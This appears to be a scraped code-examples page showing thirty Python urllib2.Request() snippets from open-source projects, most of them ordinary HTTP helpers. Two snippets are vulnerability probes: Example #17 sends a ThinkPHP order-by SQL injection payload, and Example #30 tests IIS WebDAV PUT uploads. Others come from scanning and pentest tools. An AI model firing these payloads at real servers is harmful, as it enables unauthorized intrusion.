Python urllib2.Request() Examples

The following are 30 code examples of urllib2.Request(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions/classes of the module urllib2 , or try the search function .
Example #1
Source File: senddata.py    From PiPark with GNU General Public License v2.0 7 votes vote down vote up
def post_request(vals, url):
    """
    Build a post request.

    Args:
        vals: Dictionary of (field, values) for the POST
            request.
        url: URL to send the data to.

    Returns:
        Dictionary of JSON response or error info.
    """
    # Build the request and send to server
    data = urllib.urlencode(vals)
    
    try:
        request  = urllib2.Request(url, data)
        response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
        return {"error": err.reason, "error_code": err.code} 
Example #2
Source File: utils.py    From script.module.inputstreamhelper with MIT License 6 votes vote down vote up
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None

    return req 
Example #3
Source File: reverseip.py    From sqliv with GNU General Public License v3.0 6 votes vote down vote up
def reverseip(url):
    """return domains from given the same server"""

    # get only domain name
    url = urlparse(url).netloc if urlparse(url).netloc != '' else urlparse(url).path.split("/")[0]

    source = "http://domains.yougetsignal.com/domains.php"
    useragent = useragents.get()
    contenttype = "application/x-www-form-urlencoded; charset=UTF-8"

    # POST method
    opener = urllib2.build_opener(
        urllib2.HTTPHandler(), urllib2.HTTPSHandler())
    data = urllib.urlencode([('remoteAddress', url), ('key', '')])

    request = urllib2.Request(source, data)
    request.add_header("Content-type", contenttype)
    request.add_header("User-Agent", useragent)

    try:
        result = urllib2.urlopen(request).read()

    except urllib2.HTTPError, e:
        print >> sys.stderr, "[{}] HTTP error".format(e.code) 
Example #4
Source File: bip-0070-payment-protocol.py    From checklocktimeverify-demos with GNU General Public License v3.0 6 votes vote down vote up
def payment_ack(serialized_Payment_message):
    """Generates a PaymentACK object, captures client refund address and returns a message"""

    pao = o.PaymentACK()
    pao.payment.ParseFromString(serialized_Payment_message)
    pao.memo = 'String shown to user after payment confirmation'

    refund_address = CBitcoinAddress.from_scriptPubKey(CScript(pao.payment.refund_to[0].script))

    sds_pa = pao.SerializeToString()

    open('sds_pa_blob', 'wb').write(sds_pa)
    headers = {'Content-Type' : 'application/bitcoin-payment', 'Accept' : 'application/bitcoin-paymentack'}
    http_response_object = urllib2.Request('file:sds_pa_blob', None, headers)

    return http_response_object 
Example #5
Source File: yahoo.py    From sqliv with GNU General Public License v3.0 6 votes vote down vote up
def search(self, query, per_page=10, pages=1):
        """search urls from yahoo search"""

        # store searched urls
        urls = []

        for page in range(pages):
            yahoosearch = self.yahoosearch % (query, per_page, (pages+1)*10)

            request = urllib2.Request(yahoosearch)
            request.add_header("Content-type", self.contenttype)
            request.add_header("User-Agent", self.useragent)

            result = urllib2.urlopen(request).read()
            urls += self.parse_links(result)

        return urls 
Example #6
Source File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py    From L.E.S.M.A with Apache License 2.0 6 votes vote down vote up
def build_request(url, data=None, headers=None, bump=''):
	"""Build a urllib2 request object

	This function automatically adds a User-Agent header to all requests

	"""

	if not USER_AGENT:
		build_user_agent()

	if not headers:
		headers = {}

	if url[0] == ':':
		schemed_url = '%s%s' % (SCHEME, url)
	else:
		schemed_url = url

	if '?' in url:
		delim = '&'
	else:
		delim = '?'

	# WHO YOU GONNA CALL? CACHE BUSTERS!
	final_url = '%s%sx=%s.%s' % (schemed_url, delim,
								 int(timeit.time.time() * 1000),
								 bump)

	headers.update({
		'User-Agent': USER_AGENT,
		'Cache-Control': 'no-cache',
	})

	printer('%s %s' % (('GET', 'POST')[bool(data)], final_url),
			debug=True)

	return Request(final_url, data=data, headers=headers) 
Example #7
Source File: krasfs.py    From tdw with GNU General Public License v3.0 6 votes vote down vote up
def upd(category, sort, str):
		post = urllib.urlencode({'checkbox_ftp':'on', 'checkbox_tor':'on','word':str}) 
		request = urllib2.Request('http://krasfs.ru/search.php?key=newkey')#url, post)

		request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)') 
		request.add_header('Host',    'www.krasfs.ru') 
		request.add_header('Accept', '*/*') 
		request.add_header('Accept-Language', 'ru-RU') 
		request.add_header('Referer',    'http://www.krasfs.ru') 

		try: 
			f = urllib2.urlopen(request) 
			html = f.read()
			html = html.replace(chr(10),"")
			n=html.find("<newkey>")
			k=html.find("</newkey>")
			key = html[n+8:k]
		except IOError, e: 
			if hasattr(e, 'reason'): 
				print 'We failed to reach a server. Reason: '+ e.reason
			elif hasattr(e, 'code'): 
				print 'The server couldn\'t fulfill the request. Error code: '+ e.code
			key = "59165b78-bf91-11e1-86bf-c6ab051766ba" 
Example #8
Source File: metadata.py    From awesome-zio with Apache License 2.0 6 votes vote down vote up
def query(owner, name):
    if fake:
        print '    {0}/{1}: ok'.format(owner, name)
        return (random.randint(1, 1000), random.randint(1, 300))
    else:
        try:
            req = urllib2.Request('https://api.github.com/repos/{0}/{1}'.format(owner, name))
            if user is not None and token is not None:
                b64 = base64.encodestring('{0}:{1}'.format(user, token)).replace('\n', '')
                req.add_header("Authorization", "Basic {0}".format(b64))
            u = urllib2.urlopen(req)
            j = json.load(u)
            t = datetime.datetime.strptime(j['updated_at'], "%Y-%m-%dT%H:%M:%SZ")
            days = max(int((now - t).days), 0)
            print '    {0}/{1}: ok'.format(owner, name)
            return (int(j['stargazers_count']), days)
        except urllib2.HTTPError, e:
            print '    {0}/{1}: FAILED'.format(owner, name)
            return (None, None) 
Example #9
Source File: proxy.py    From plugin.video.ustvvod with GNU General Public License v2.0 6 votes vote down vote up
def serveFile(self, fURL, sendData, httphandler = None, cookienum = 0):
		cj = cookielib.LWPCookieJar(ustvpaths.COOKIE % str(cookienum))
		if httphandler is None:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		else:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), httphandler)
		request = urllib2.Request(url = fURL)
		sheaders = self.decodeHeaderString(self.headers.headers)
		del sheaders['Host']
		sheaders['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
		for key in sheaders:
			opener.addheaders = [(key, sheaders[key])]
		if os.path.isfile(ustvpaths.COOKIE % str(cookienum)):
			cj.load(ignore_discard = True)
			cj.add_cookie_header(request)
		response = opener.open(request, timeout = TIMEOUT)
		self.send_response(200)
		headers = response.info()
		for key in headers:
			try:
				self.send_header(key, headers[key])
			except Exception, e:
				print "Exception: ", e
				pass 
Example #10
Source File: dirtester.py    From pythonpentest with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def host_test(filename, host):
    file = "headrequests.log"
    bufsize = 0
    e = open(file, 'a', bufsize)
    print("[*] Reading file %s") % (file)
    with open(filename) as f:
        locations = f.readlines()
    for item in locations:
        target = host + "/" + item
        try:
            request = urllib2.Request(target)
            request.get_method = lambda : 'GET'
            response = urllib2.urlopen(request)
        except:
            print("[-] %s is invalid") % (str(target.rstrip('\n')))
            response = None
        if response != None:
            print("[+] %s is valid") % (str(target.rstrip('\n')))
            details = response.info()
            e.write(str(details))
    e.close() 
Example #11
Source File: virustotal.py    From LinuxEmergency with MIT License 6 votes vote down vote up
def _file_rescan(self,_id):
        _string = ''
        if isinstance(_id,list):
            for sid in _id:
                _string += "%s,"%sid
        else:
            _string = '%s,'%str(_id)
        _string = _string[0:-1]
        _parameters = {"resource":_string,"apikey":self._key}
        try:
            data = urllib.urlencode(_parameters)
            _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan",data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception, reason:
            return None 
Example #12
Source File: run.py    From github-stats with MIT License 6 votes vote down vote up
def check_for_update():
  if os.path.exists(FILE_UPDATE):
    mtime = os.path.getmtime(FILE_UPDATE)
    last = datetime.utcfromtimestamp(mtime).strftime('%Y-%m-%d')
    today = datetime.utcnow().strftime('%Y-%m-%d')
    if last == today:
      return
  try:
    with open(FILE_UPDATE, 'a'):
      os.utime(FILE_UPDATE, None)
    request = urllib2.Request(
      CORE_VERSION_URL,
      urllib.urlencode({'version': __version__}),
    )
    response = urllib2.urlopen(request)
    with open(FILE_UPDATE, 'w') as update_json:
      update_json.write(response.read())
  except (urllib2.HTTPError, urllib2.URLError):
    pass 
Example #13
Source File: metadata.py    From awesome-scala with Apache License 2.0 6 votes vote down vote up
def query(owner, name):
    if fake:
        print("    {0}/{1}: ok".format(owner, name))
        return (random.randint(1, 1000), random.randint(1, 300))
    else:
        try:
            req = urllib2.Request(
                "https://api.github.com/repos/{0}/{1}".format(owner, name)
            )
            if user is not None and token is not None:
                b64 = base64.encodestring("{0}:{1}".format(user, token)).replace(
                    "\n", ""
                )
                req.add_header("Authorization", "Basic {0}".format(b64))
            u = urllib2.urlopen(req)
            j = json.load(u)
            t = datetime.datetime.strptime(j["updated_at"], "%Y-%m-%dT%H:%M:%SZ")
            days = max(int((now - t).days), 0)
            print("    {0}/{1}: ok".format(owner, name))
            return (int(j["stargazers_count"]), days)
        except urllib2.HTTPError as e:
            print("    {0}/{1}: FAILED".format(owner, name))
            return (None, None) 
Example #14
Source File: client.py    From d6tpipe with MIT License 6 votes vote down vote up
def _make_request(self, opener, request, timeout=None):
        """Make the API call and return the response. This is separated into
           it's own function, so we can mock it easily for testing.

        :param opener:
        :type opener:
        :param request: url payload to request
        :type request: urllib.Request object
        :param timeout: timeout value or None
        :type timeout: float
        :return: urllib response
        """
        timeout = timeout or self.timeout
        try:
            return opener.open(request, timeout=timeout)
        except HTTPError as err:
            exc = handle_error(err)
            return exc 
Example #15
Source File: sosac.py    From plugin.video.sosac.ph with GNU General Public License v2.0 6 votes vote down vote up
def probe_html5(self, result):

        class NoRedirectHandler(urllib2.HTTPRedirectHandler):

            def http_error_302(self, req, fp, code, msg, headers):
                infourl = urllib.addinfourl(fp, headers, req.get_full_url())
                infourl.status = code
                infourl.code = code
                return infourl
            http_error_300 = http_error_302
            http_error_301 = http_error_302
            http_error_303 = http_error_302
            http_error_307 = http_error_302

        opener = urllib2.build_opener(NoRedirectHandler())
        urllib2.install_opener(opener)

        r = urllib2.urlopen(urllib2.Request(result['url'], headers=result['headers']))
        if r.code == 200:
            result['url'] = r.read()
        return result 
Example #16
Source File: server.py    From pydnschain with Mozilla Public License 2.0 6 votes vote down vote up
def lookup(self, name, host_override=None):
        """
        Looks up a name from the DNSChain server. Throws exception if the
        data is not valid JSON or if the namecoin entry does not exist in the
        blockchain.

        @param name: The name to lookup, e.g. 'id/dionyziz', note this $NAMESPACE/$NAME
        format is not guaranteed.  Additionally the caller must perform appropriate url
        encoding _before_ the name is passed to urllib2.urlopen
        """
        if host_override is not None:
            self.headers['Host'] = host_override
        full_url = "http://%s/%s" % (self.addr, name)
        request = urllib2.Request(full_url, None, self.headers)
        try:
            response = urllib2.urlopen(request)
        except urllib2.HTTPError, e:
            if e.code == 404:
                e = DataNotFound(e, name, self.headers['Host'])
            if e.code < 200 or e.code > 299:
                self._log.debug("%s" % (e.msg,), exc_info=True)
                raise e 
Example #17
Source File: ThinkPHP-3.X-5.X-orderby-sql.py    From xunfeng_vul_poc with GNU General Public License v3.0 6 votes vote down vote up
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        flag = "GET /?order[updatexml(1,concat(0x3a,user()),1)]=1 HTTP/1.1"
        s.send(flag)
        time.sleep(1)
        data = s.recv(1024)
        s.close()
        if 'GET' in data:
            url = 'http://' + ip + ":" + str(port) + '/?order[updatexml(1,concat(0x3a,user()),1)]=1'
            request = urllib2.Request(url)
            res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
            if 'root' in res_html:
                return u"ThinkPHP 3.X order by注入漏洞"


    except Exception, e:
        pass 
Example #18
Source File: zooqle.py    From search-plugins with GNU General Public License v2.0 6 votes vote down vote up
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat 
Example #19
Source File: zooqle.py    From search-plugins with GNU General Public License v2.0 6 votes vote down vote up
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat 
Example #20
Source File: aql-to-reference-data.py    From data-import with Apache License 2.0 6 votes vote down vote up
def call_api(self, endpoint, method, headers=None, params=[], data=None, quiet=False):

        path = self.parse_path(endpoint, params)

        # If custom headers are not specified we can use the default headers
        if not headers:
            headers = self.headers
        # Send the request and receive the response
        if not self.quiet:
            print('\nSending ' + method + ' request to: ' + 'https://' +self.server_ip+self.base_uri+path+'\n')

        request = Request(
            'https://'+self.server_ip+self.base_uri+path, headers=headers)
        request.get_method = lambda: method
        try:
            #returns response object for opening url.
            return urlopen(request, data)
        except HTTPError as e:
            #an object which contains information similar to a request object
            return e

    # This method constructs the query string 
Example #21
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Post(self, url, data, refer=None):
        try:
            req = urllib2.Request(url, urllib.urlencode(data))
            if not (refer is None):
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError, e:
            return e.read() 
Example #22
Source File: test.py    From recruit with Apache License 2.0 5 votes vote down vote up
def extract_wsgi(self, environ, headers):
        """Extract the server's set-cookie headers as cookies into the
        cookie jar.
        """
        self.extract_cookies(
            _TestCookieResponse(headers), U2Request(get_current_url(environ))
        ) 
Example #23
Source File: update_assets.py    From data-import with Apache License 2.0 5 votes vote down vote up
def call_api(self, endpoint, method, headers=None, params=[], data=None, quiet=False):

        path = self.parse_path(endpoint, params)

        # If custom headers are not specified we can merge the default headers
        if not headers:
            headers = self.headers
	else:
	    for key, value in self.headers.items():
	        if headers.get( key,'') == '':
		    headers[ key ] = value

        # Send the request and receive the response
        if not self.quiet:
            print('\nSending ' + method + ' request to: ' + 'https://' +self.server_ip+self.base_uri+path+'\n')

        request = Request(
            'https://'+self.server_ip+self.base_uri+path, headers=headers)
        request.get_method = lambda: method
        try:
            #returns response object for opening url.
            return urlopen(request, data)
        except HTTPError as e:
            #an object which contains information similar to a request object
            return e

    # This method constructs the query string 
Example #24
Source File: bot.py    From LINE-ChatBot with MIT License 5 votes vote down vote up
def meme(self):
        self.__consts.WANCAK_RAND.close()
        url_image = str(self.obj['img'])
        urlreq = urllib2.Request(url_image, headers=self.__consts.CONST_REFERER)
        op = urllib2.urlopen(urlreq)
        sv_file = open(url_image[-38:],'wb+')
        sv_file.write(str(op.read()))
        sv_file.close()
        self.group.sendImage(url_image[-38:])

    # Running under Linux OS Only. 
Example #25
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Get(self, url, refer=None):
        try:
            req = urllib2.Request(url)
            if not (refer is None):
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError, e:
            return e.read() 
Example #26
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Get(self, url, refer=None):
        try:
            req = urllib2.Request(url)
            if not (refer is None):
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError, e:
            return e.read() 
Example #27
Source File: sosac.py    From plugin.video.sosac.ph with GNU General Public License v2.0 5 votes vote down vote up
def request_last_update(self, url):
        util.debug('request: %s' % url)
        lastmod = None
        req = urllib2.Request(url)
        req.add_header('User-Agent', util.UA)
        try:
            response = urllib2.urlopen(req)
            lastmod = datetime.datetime(*response.info().getdate('Last-Modified')[:6]).strftime(
                '%d.%m.%Y')
            response.close()
        except urllib2.HTTPError, error:
            util.debug(error.read())
            error.close() 
Example #28
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Post(self, url, data, refer=None):
        try:
            req = urllib2.Request(url, urllib.urlencode(data))
            if not (refer is None):
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError, e:
            return e.read() 
Example #29
Source File: jsonrpclib.py    From odoorpc with GNU Lesser General Public License v3.0 5 votes vote down vote up
def __call__(self, url, params=None):
        if params is None:
            params = {}
        data = {
            "jsonrpc": "2.0",
            "method": "call",
            "params": params,
            "id": random.randint(0, 1000000000),
        }
        if url.startswith('/'):
            url = url[1:]
        full_url = self._get_full_url(url)
        log_data = get_json_log_data(data)
        logger.debug(LOG_JSON_SEND_MSG, {'url': full_url, 'data': log_data})
        data_json = json.dumps(data)
        request = Request(url=full_url, data=encode_data(data_json))
        request.add_header('Content-Type', 'application/json')
        response = self._opener.open(request, timeout=self._timeout)
        if not self._deserialize:
            return response
        result = json.load(decode_data(response))
        logger.debug(
            LOG_JSON_RECV_MSG,
            {'url': full_url, 'data': log_data, 'result': result},
        )
        return result 
Example #30
Source File: 15-WebDav-getshell.py    From vulscan with MIT License 5 votes vote down vote up
def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        import socket
        import time
        import urllib2

        try:
            socket.setdefaulttimeout(5)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:80\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % vul_url
            s.send(flag)
            time.sleep(1)
            data = s.recv(1024)
            s.close()
            if 'PUT' in data:
                url = vul_url + '/vultest.txt'
                request = urllib2.Request(url)
                res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
                if 'xxscan0' in res_html:
                    print u"iis webdav漏洞"
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = flag
            else:
                #print u'\n【不存在漏洞】 ' + url
                pass
        except:
            # return url
            pass
        print '[+]15 poc done'
        return self.save_output(result)

    #漏洞攻击